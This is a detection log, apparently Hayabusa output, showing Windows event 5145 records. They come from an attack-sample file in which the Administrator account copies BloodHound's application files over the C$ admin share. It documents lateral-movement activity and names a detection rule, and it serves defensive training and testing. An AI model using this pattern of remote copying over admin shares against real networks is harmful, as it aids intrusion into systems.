+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
